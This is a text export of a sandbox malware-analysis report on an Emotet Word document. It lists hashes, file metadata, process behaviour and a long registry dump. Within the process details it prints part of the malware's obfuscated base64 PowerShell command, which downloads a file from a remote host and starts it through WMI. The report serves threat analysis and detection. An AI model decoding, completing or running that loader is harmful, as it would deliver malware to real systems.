Task5 Report
Task5 Report
General Info
File name: CMO-100120 CDW-102220.doc
Threats: Emotet
Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even
private users get infected in mass spam email campaigns.
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Minima., Author: Mael Schneider, Template: Normal.dotm, Last Saved By: Noa Masson,
Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Oct 22 07:54:00 2020, Last Saved Time/Date: Thu Oct 22 07:54:00 2020, Number of Pages: 1,
Number of Words: 3675, Number of Characters: 20950, Security: 8
MD5: 27E3A6A2A661389C26F2CA9CBF39CC0F
SHA1: 91257B16C8EA0A0C236F9824672ABF04E118C5C9
SHA256: E2D2EBAFC33D7C7819F414031215C3669BCCDFB255AF3CBE0177B2C601B0E0CD
SSDEEP: 3072:aJivKie6B/w2yiWydwLQ/qR+zAf0Yjau23RW9Wn:aJiP/w2PtqReAf0YjARW9
Launch configuration
Task duration: 300 seconds Heavy Evasion option: off Network geolocation: off
Additional time used: 240 seconds MITM proxy: off Privacy: Public submission
Network: on
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000) KB2579686
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 1/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000) KB2676562
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 2/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Microsoft Office Proof (English) 2010 (14.0.6029.1000) KB2984972
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB3074543
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000) KB3109103
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 3/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013) KB3155178
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005) KB3161949
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005) KB3170735
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702) KB3179573
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702) KB3184143
KB4567409
KB958488
KB976902
KB982018
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
RollupFix
UltimateEdition
Behavior activities
MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process Checks supported languages Reads the computer name
regidle.exe (PID: 3164) POwersheLL.exe (PID: 3828) WINWORD.EXE (PID: 2728)
G_jugk.exe (PID: 1640) regidle.exe (PID: 3164)
Creates files in the user directory
G_jugk.exe (PID: 1640)
EMOTET was detected WINWORD.EXE (PID: 2728)
regidle.exe (PID: 3164) Reads the computer name
Checks supported languages
POwersheLL.exe (PID: 3828)
Drops executable file immediately after starts WINWORD.EXE (PID: 2728)
regidle.exe (PID: 3164)
G_jugk.exe (PID: 1640)
G_jugk.exe (PID: 1640) Reads mouse settings
Connects to CnC server WINWORD.EXE (PID: 2728)
regidle.exe (PID: 3164) Reads the date of Windows installation
POwersheLL.exe (PID: 3828) Reads Microsoft Office registry keys
WINWORD.EXE (PID: 2728)
PowerShell script executed
POwersheLL.exe (PID: 3828)
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 4/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Malware configuration
No Malware configuration.
Static information
TRiD EXIF
Keywords:
Comments:
Template: Normal.dotm
RevisionNumber: 1
TotalEditTime: 0
Pages: 1
Words: 3675
Characters: 20950
Company:
Lines: 174
Paragraphs: 49
CharCountWithSpaces: 24576
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
HeadingPairs: Title
LocaleIndicator: 1033
TagE: Sapiente animi numquam iure aut. Tempore saepe nam aut
ratione ipsa vel tempore quae. Sequi repellendus quia et
voluptatem.
CompObjUserTypeLen: 32
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 5/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Processes
Total processes Monitored processes Malicious processes Suspicious processes
45 4 2 1
Behavior graph
start winword.exe
no specs
powershell.exe
#EMOTET
g_jugk.exe drop and start regidle.exe
Specs description
Program did not start Low-level access to the HDD Process was added to the startup Debug information is available
Probably Tor was used Behavior similar to spam Task has injected processes Executable file was dropped
Known threat RAM overrun Network attacks were detected Integrity level elevation
Connects to the network CPU overrun Process starts the services System was rebooted
File is detected by antivirus software Inspected object has suspicious PE Behavior similar to exploiting Task contains an error or was
structure the vulnerability rebooted
Process information
Information
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 6/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 7/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
QAE8AJwArACcAMwAnACkAKwAoACcAMgB3ACcAKwAnAGkAJ
wApACsAKAAnAGsAaQAnACsAJwBiAHIAaQAnACkAKwAnAGMA
bwAnACsAKAAnAGwAJwArACcAYQBnAGUALgBjAG8AbQAnACs
AJwA9ACcAKwAnAFAAJwArACcATwAzADIAdwBwACcAKwAnAC
0AJwArACcAYQBkAG0AaQAnACkAKwAoACcAbgA9AFAAJwArA
CcATwAnACkAKwAoACcAMwAyAFgAaQAnACsAJwBaACcAKQAr
ACgAJwByAGIAJwArACcAeQA9AFAAJwApACsAJwBPACcAKwA
nADMAMgAnACkALgAiAFIAYABFAFAATABBAGAAYwBFACIAKAA
oACgAJwA9AFAATwAnACsAJwAzACcAKQArACcAMgAnACkALA
AnAC8AJwApAC4AIgBTAFAAbABgAEkAdAAiACgAJABCAGgAeQ
BiAGQAZQBmACAAKwAgACQAWQAzADgAMABvADEAZgAgACs
AIAAkAEEAXwBiAGYAaABrAGgAKQA7ACQAUQA1ADIAbAA5AGo
ANwA9ACgAJwBVADUAJwArACgAJwBmACcAKwAnAGIAMwAn
ACkAKwAnAHQAdgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKA
AkAFcAeAB5AG4AagAxADkAIABpAG4AIAAkAEcAXwBhAHcAaA
BpADkAKQB7AHQAcgB5AHsAJABTAGwAbAA4AG8AawB1AC4AI
gBkAGAAbwBXAG4ATABvAEEARABmAGAAaQBsAGUAIgAoACQ
AVwB4AHkAbgBqADEAOQAsACAAJABTAGcAdwBxADcANwA5A
CkAOwAkAEMAMQA0AHQAbABfAGIAPQAoACcATAAnACsAKAA
nAG0AOAAnACsAJwA5AHMAdgBkACcAKQApADsASQBmACAA
KAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACc
AbQAnACkAIAAkAFMAZwB3AHEANwA3ADkAKQAuACIAbABFAG
AATgBHAGAAVABoACIAIAAtAGcAZQAgADQANAA2ADgANgApA
CAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAnAHcAJwAr
ACgAJwBpAG4AMwAyACcAKwAnAF8AUAAnACkAKwAoACcAcg
BvAGMAZQAnACsAJwBzAHMAJwApACkAKQAuACIAYwBgAFIA
YABlAGEAVABFACIAKAAkAFMAZwB3AHEANwA3ADkAKQA7ACQ
ARwBjAGEAMwBiAGYANQA9ACgAJwBQACcAKwAoACcAagBrAD
AAZQAnACsAJwBjAHQAJwApACkAOwBiAHIAZQBhAGsAOwAkA
EMAYgByAHMAeQBzAHgAPQAoACcAUAAnACsAKAAnADYAJwA
rACcAdwBtADkAdQBoACcAKQApAH0AfQBjAGEAdABjAGgAewB9
AH0AJABLAG0AdABxAHUAZwBjAD0AKAAoACcAWgBoAHoAJw
ArACcAMQAnACkAKwAoACcAMwBnACcAKwAnAG0AJwApACkA
Information
Information
Information
Registry activity
Total events Read events Write events Delete events
Modification events
Value: 2C783300A80A0000010000000000000000000000
Value: Off
Value: Off
Value: Off
Value: Off
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 8/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: Off
Value: Off
Value: Off
Value: Off
Value: On
Value: On
Value: On
Value: On
Value: On
Value: On
Value: On
Value: On
Value: On
Value: On
Value:
Value:
Value:
Value: A80A0000E15B7C49DB8AD70100000000
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 9/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
006D00000000000000
Value: 26793300A80A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0
052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074
006D00000000000000
Value: 32793300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
Value: 32793300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
Value: 1
Value: 1
Value: 1
Value: 0
Value: 3C7A3300A80A000006000000010000008800000002000000780000000400000063003A005C00750073006500720073005C00610064006D0069006E005C00610070007000640061007400610
05C006C006F00630061006C005C00740065006D0070005C0063006D006F002D0031003000300031003200300020006300640077002D003100300032003200320030002E0064006F00630000
0000000000
Value:
Value: 25
Value: [F00000000][T01D56F995041B2E0][O00000000]*C:\Users\admin\Documents\
Value: [F00000000][T01D56F995041B2E0][O00000000]*C:\Users\admin\Documents\
Value: [F00000000][T01D56F98784E7EE0][O00000000]*C:\Users\admin\Downloads\
Value: [F00000000][T01D56F98784E7EE0][O00000000]*C:\Users\admin\Downloads\
Value: 25
Value: 25
Value: [F00000000][T01D655C737260480][O00000000]*C:\Users\admin\Desktop\earthphoto.rtf
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 10/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: [F00000000][T01D655C737260480][O00000000]*C:\Users\admin\Desktop\earthphoto.rtf
Value: [F00000000][T01D4A71D9B2F9D00][O00000000]*C:\Users\admin\Desktop\seaoverview.rtf
Value: [F00000000][T01D4A71D9B2F9D00][O00000000]*C:\Users\admin\Desktop\seaoverview.rtf
Value: [F00000000][T01D460307721EE80][O00000000]*C:\Users\admin\Desktop\educationget.rtf
Value: [F00000000][T01D460307721EE80][O00000000]*C:\Users\admin\Desktop\educationget.rtf
Value: [F00000000][T01D6B2F771F5B200][O00000000]*C:\Users\admin\Desktop\paulcell.rtf
Value: [F00000000][T01D6B2F771F5B200][O00000000]*C:\Users\admin\Desktop\paulcell.rtf
Value: [F00000000][T01D280E52F543C00][O00000000]*C:\Users\admin\Documents\nameflowers.rtf
Value: [F00000000][T01D280E52F543C00][O00000000]*C:\Users\admin\Documents\nameflowers.rtf
Value: [F00000000][T01D734197EDFB180][O00000000]*C:\Users\admin\Documents\namefew.rtf
Value: [F00000000][T01D734197EDFB180][O00000000]*C:\Users\admin\Documents\namefew.rtf
Value: [F00000000][T01D3BC45C6AB8800][O00000000]*C:\Users\admin\Documents\citydocumentation.rtf
Value: [F00000000][T01D3BC45C6AB8800][O00000000]*C:\Users\admin\Documents\citydocumentation.rtf
Value: [F00000000][T01D60EFBFE383900][O00000000]*C:\Users\admin\Documents\cleansystem.rtf
Value: [F00000000][T01D60EFBFE383900][O00000000]*C:\Users\admin\Documents\cleansystem.rtf
Value: 04000000A80A00003B00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0
070005C0043004D004F002D0031003000300031003200300020004300440057002D003100300032003200320030002E0064006F0063001900000043004D004F002D003100300030003100320
0300020004300440057002D003100300032003200320030002E0064006F006300000000000100000000000000D3347549DB8AD70159472B0059472B0000000000DB04000000000000000000
0000000000000000000000000000000000FFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000FFFFFFFF
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 11/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 3C7A3300A80A000006000000010000008800000002000000780000000400000063003A005C00750073006500720073005C00610064006D0069006E005C00610070007000640061007400610
05C006C006F00630061006C005C00740065006D0070005C0063006D006F002D0031003000300031003200300020006300640077002D003100300032003200320030002E0064006F00630000
0000000000
Value: 6
Value: C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
Value: C:\Users\admin\AppData\Local\Temp\VBE
Value: Font
Value: IDataAutoWrapper
Value: IReturnInteger
Value: IReturnBoolean
Value: IReturnString
Value: IReturnSingle
Value: IReturnEffect
Value: IControl
Value: Controls
Value: IOptionFrame
Value: _UserForm
Value: ControlEvents
Value: FormEvents
Value: OptionFrameEvents
Value: ILabelControl
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 12/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: ICommandButton
Value: IMdcText
Value: IMdcList
Value: IMdcCombo
Value: IMdcCheckBox
Value: IMdcOptionButton
Value: IMdcToggleButton
Value: IScrollbar
Value: Tab
Value: Tabs
Value: ITabStrip
Value: ISpinbutton
Value: IImage
Value: IWHTMLSubmitButton
Value: IWHTMLImage
Value: IWHTMLReset
Value: IWHTMLCheckbox
Value: IWHTMLOption
Value: IWHTMLText
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 13/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: IWHTMLHidden
Value: IWHTMLSelect
Value: IWHTMLTextArea
Value: LabelControlEvents
Value: CommandButtonEvents
Value: MdcTextEvents
Value: MdcListEvents
Value: MdcComboEvents
Value: MdcCheckBoxEvents
Value: MdcOptionButtonEvents
Value: MdcToggleButtonEvents
Value: ScrollbarEvents
Value: TabStripEvents
Value: SpinbuttonEvents
Value: ImageEvents
Value: WHTMLControlEvents
Value: WHTMLControlEvents1
Value: WHTMLControlEvents2
Value: WHTMLControlEvents3
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 14/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: WHTMLControlEvents4
Value: WHTMLControlEvents5
Value: WHTMLControlEvents6
Value: WHTMLControlEvents7
Value: WHTMLControlEvents9
Value: WHTMLControlEvents10
Value: IPage
Value: Pages
Value: IMultiPage
Value: MultiPageEvents
Value:
Value: 207C3300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
Value: 207C3300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
Value: 3F7C3300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
Value: 6F7C3300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
Value: 6F7C3300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 15/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: en-US
Value: 2D7D3300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
Value: 2D7D3300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
Value: 3C7D3300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
Value: 0
Value: 0
Value:
Value:
Value: 1048576
Value: %windir%\tracing
Value: 0
Value: 0
Value:
Value: 1048576
Value: %windir%\tracing
Value: 01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F006
6006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 16/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value:
Value:
Value:
Value:
Value:
Value:
Value:
Value:
Value:
Value:
Value:
Value:
Value:
Value:
Value: 6000000060000000F5FFFFFF000000000000000000000000BC02000000000000004000225400610068006F006D00610000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000005400610068006F006D00610000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000D0000000B000000020000000200000000000000060000001A000000BC0200000000000060000000600000002000FDFF1F0020000000002700000000FF2E00E15B6000C029000000000000
000100000000002820070000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000005400610068006F006D00610000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 17/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000D0000000B0000000200000002000000000000000500000017000000900100000000000060000000600000002000FDFF1F0020000000002700000000FF2E00E15B6000C029000
00000000000010000000000282006000000F7FFFFFF0000000000000000000000009001000000000000004000225400610068006F006D00610000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000005400610068006F006D00610000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000B000000090000000200000002000000000000000400000013000000900100000000000060000000600000002000FDFF1F0020000000002700000000FF2E00E15B60
00C02900000000000000010000000000282005000000
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 18/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 19/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 20/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 21/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 22/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 23/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 1
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 24/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 25/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
